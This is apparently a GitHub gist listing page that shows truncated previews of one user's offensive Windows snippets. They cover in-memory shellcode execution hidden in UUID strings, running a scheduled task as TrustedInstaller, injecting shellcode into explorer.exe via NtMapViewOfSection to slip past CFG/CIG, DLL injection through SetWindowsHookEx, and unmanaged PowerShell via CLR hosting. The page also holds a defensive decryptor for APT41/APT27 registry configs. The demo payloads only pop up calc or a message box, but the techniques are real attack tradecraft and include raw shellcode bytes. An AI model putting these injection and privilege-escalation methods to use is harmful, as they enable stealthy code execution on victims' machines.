farzinenddo
farzinenddo
/ uuid.c
Created
March 22, 2021 23:29
Execute ShellCode in memory by abusing windows API
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <Rpc.h> | |
| #include <iostream> | |
| #pragma comment(lib, "Rpcrt4.lib") | |
| const char* uuids[] = | |
| { | |
| "6850c031-6163-636c-5459-504092741551", | |
| "2f728b64-768b-8b0c-760c-ad8b308b7e18", |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Get-PEMetaData { | |
| [CmdletBinding()] | |
| param($Path) | |
| try { | |
| $FullPath = Resolve-Path -Path $Path -ErrorAction Stop | |
| try { | |
| $Null = [Reflection.AssemblyName]::GetAssemblyName($FullPath) | |
| $Signature = Get-AuthenticodeSignature -FilePath $FullPath -ErrorAction SilentlyContinue |
farzinenddo
/ ScheduledTask.ps1
Created
May 6, 2020 21:54
Using COM Object for running task under "NT SERVICE\TrustedInstaller" Token
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $task = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c calc" | |
| Register-ScheduledTask -TaskName "TestMe" -Action $task | |
| $com.Connect() | |
| $user = "NT SERVICE\TrustedInstaller" | |
| $folder = $com.GetFolder('\') | |
| $t = $folder.GetTask('TestMe') | |
| $t.RunEx($null,0,0,$user) |
farzinenddo
/ ExtraByte_ProcessInjection.cpp
Last active
April 15, 2020 22:49
Injecting ShellCode to explorer.exe with ExtraByte and NtMapViewOfSection technique and not affected by CFG/CIG
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| #include <Windows.h> | |
| // messagebox(x64) shellcode | |
| unsigned char shellcode[] = | |
| "\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51" | |
| "\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48" | |
| "\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48" | |
| "\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02" | |
| "\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e" |
farzinenddo
/ dll.cpp
Last active
April 1, 2020 19:54
Injecting DLL by Smashing the REF and SetWindowsHookEx
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <Windows.h> | |
| #include <string> | |
| void job() { | |
| TCHAR szExeFileName[MAX_PATH]; | |
| GetModuleFileName(NULL, szExeFileName, MAX_PATH); | |
| std::wstring exeName = szExeFileName; | |
| int pos = exeName.find_last_of(L"\\"); | |
| exeName = exeName.substr(pos + 1, exeName.length()); | |
| std::wstring message = L"Injected in " + exeName + L" (PID " + std::to_wstring(GetCurrentProcessId()) + L")"; |
farzinenddo
/ Powerless.cpp
Created
March 23, 2020 18:44
Running Powershell with CLR in native runtime.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <metahost.h> | |
| #pragma comment(lib, "mscoree.lib") | |
| int main(int argc, wchar_t* argv[]) | |
| { | |
| HRESULT hr; | |
| ICLRMetaHost *pMetaHost = NULL; | |
| ICLRRuntimeInfo *pRuntimeInfo = NULL; | |
| ICLRRuntimeHost *pClrRuntimeHost = NULL; |
farzinenddo
/ apt41-registry-decryptor.ps1
Created
March 12, 2020 00:40
Search registry for config created by APT41 or APT27 and decrypt their contents
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $CPU = (Get-ItemProperty HKLM:\HARDWARE\DESCRIPTION\System\CentralProcessor\0\).Identifier | |
| $value = ls "Registry::HKEY_CLASSES_ROOT\$CPU*" | |
| $key = [System.Text.Encoding]::UTF8.GetBytes([System.Text.Encoding]::UTF8.GetString($CPU.Substring(0,8))) | |
| $iv = $key | |
| $provider = New-Object System.Security.Cryptography.DESCryptoServiceProvider | |
| $provider.Mode = [System.Security.Cryptography.CipherMode]::CBC | |
| $provider.Padding = [System.Security.Cryptography.PaddingMode]::None | |
| $decryptor = $provider.CreateDecryptor($key, $iv) |